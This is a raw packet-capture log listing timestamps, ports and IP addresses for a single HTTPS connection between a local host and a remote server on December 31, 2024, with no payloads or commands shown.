Dec 31, 2024 08:57:16.997658014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.997678995 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.998032093 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.998049974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.998114109 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.998122931 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.998135090 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.999202013 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.999229908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.999255896 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.999264002 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.999304056 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.023973942 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.023991108 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.024013042 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.024024010 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.024065018 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.052406073 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.052424908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.052491903 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.052491903 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.052504063 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.052982092 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053018093 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053056955 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.053066015 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053072929 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.053409100 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053426981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053464890 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.053471088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053510904 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.053905964 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053932905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053966045 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.053972006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.053987026 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.084534883 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.084556103 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.084619045 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.084628105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.084672928 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.084996939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.085036039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.085057974 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.085062027 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.085078001 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.086014032 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.086026907 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.086076021 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.086083889 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.086218119 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.111027956 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.111049891 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.111079931 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.111092091 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.111104965 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.139262915 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.139291048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.139339924 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.139347076 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.139364958 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.139869928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.139889002 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.139911890 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.139919043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.139964104 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.140388966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.140402079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.140449047 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.140455008 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.140465975 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.140707970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.140727043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.140747070 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.140755892 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.140779018 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.171159983 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.171201944 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.171219110 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.171226978 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.171267986 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.171641111 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.171659946 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.171700001 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.171705008 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.171731949 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.172538996 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.172553062 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.172589064 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.172596931 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.172622919 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.197715044 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.197740078 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.197767019 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.197773933 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.197807074 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.226159096 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.226174116 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.226249933 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.226258039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.226716995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.226733923 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.226773024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.226778030 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.226803064 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.227160931 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.227174044 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.227241039 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.227241039 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.227247953 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.227636099 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.227658033 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.227682114 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.227688074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.227699041 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.258044958 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.258066893 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.258132935 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.258132935 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.258141041 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.258636951 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.258654118 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.258692980 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.258697987 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.258707047 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.259464979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.259479046 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.259510040 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.259519100 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.259533882 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.284506083 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.284523010 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.284559011 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.284564972 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.284595013 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.312994957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.313008070 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.313060045 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.313066006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.313477993 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.313498020 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.313524008 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.313529015 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.313579082 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.314002991 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.314016104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.314095020 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.314100981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.314423084 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.314443111 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.314469099 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.314475060 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.314503908 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.344880104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.344892979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.344969034 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.344969034 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.344974995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.345279932 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.345297098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.345346928 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.345346928 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.345354080 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.346124887 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.346138954 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.346173048 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.346179008 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.346208096 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.371341944 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.371360064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.371400118 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.371406078 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.371431112 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.399822950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.399837017 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.399955988 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.399961948 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.400264978 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.400280952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.400305033 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.400309086 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.400333881 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.400614977 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.400634050 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.400671959 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.400676966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.400691986 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.401084900 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.401099920 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.401134014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.401139975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.401164055 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.431740999 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.431755066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.431802034 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.431809902 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.431848049 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.432255983 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.432275057 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.432303905 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.432308912 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.432327032 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.432929993 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.432941914 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.432986975 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.432995081 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.458280087 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.458297968 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.458364010 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.458364010 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.458369970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.486736059 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.486748934 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.486779928 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.486785889 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.486816883 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.487164974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.487183094 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.487220049 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.487226009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.487241983 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.487523079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.487536907 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.487561941 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.487566948 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.487591028 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.487952948 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.487973928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.487994909 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.487998962 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.488038063 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.518698931 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.518712997 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.518757105 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.518764973 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.518778086 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.519191980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.519208908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.519252062 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.519257069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.519279003 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.519833088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.519845963 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.519877911 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.519882917 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.519905090 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.545162916 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.545181036 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.545212030 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.545224905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.545242071 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.574986935 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.575001001 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.575061083 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.575067997 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.575629950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.575680017 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.575690985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.575695992 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.575723886 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.576035023 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.576047897 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.576128960 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.576133013 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.576570988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.576587915 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.576622009 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.576631069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.576646090 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.605560064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.605582952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.605611086 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.605614901 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.605658054 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.605968952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.605983019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.606064081 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.606070995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.606545925 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.606564045 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.606594086 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.606600046 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.606622934 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.632050991 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.632076025 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.632102966 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.632112980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.632152081 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.664470911 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.664489031 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.664520025 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.664525986 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.664563894 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.664963007 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.664975882 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.665040970 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.665040970 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.665046930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.665385008 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.665406942 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.665433884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.665437937 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.665467024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.665894032 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.665908098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.665941954 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.665947914 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.665980101 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.692312956 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.692331076 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.692368984 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.692374945 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.692409039 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.692806005 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.692819118 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.692920923 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.692926884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.693319082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.693336010 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.693363905 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.693370104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.693397045 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.718821049 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.718843937 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.718889952 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.718898058 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.718916893 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.751203060 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.751230955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.751272917 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.751280069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.751334906 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.751718998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.751733065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.751774073 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.751780033 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.751796007 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.752219915 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.752238035 CET	443	49735	188.114.97.3	192.168.2.4
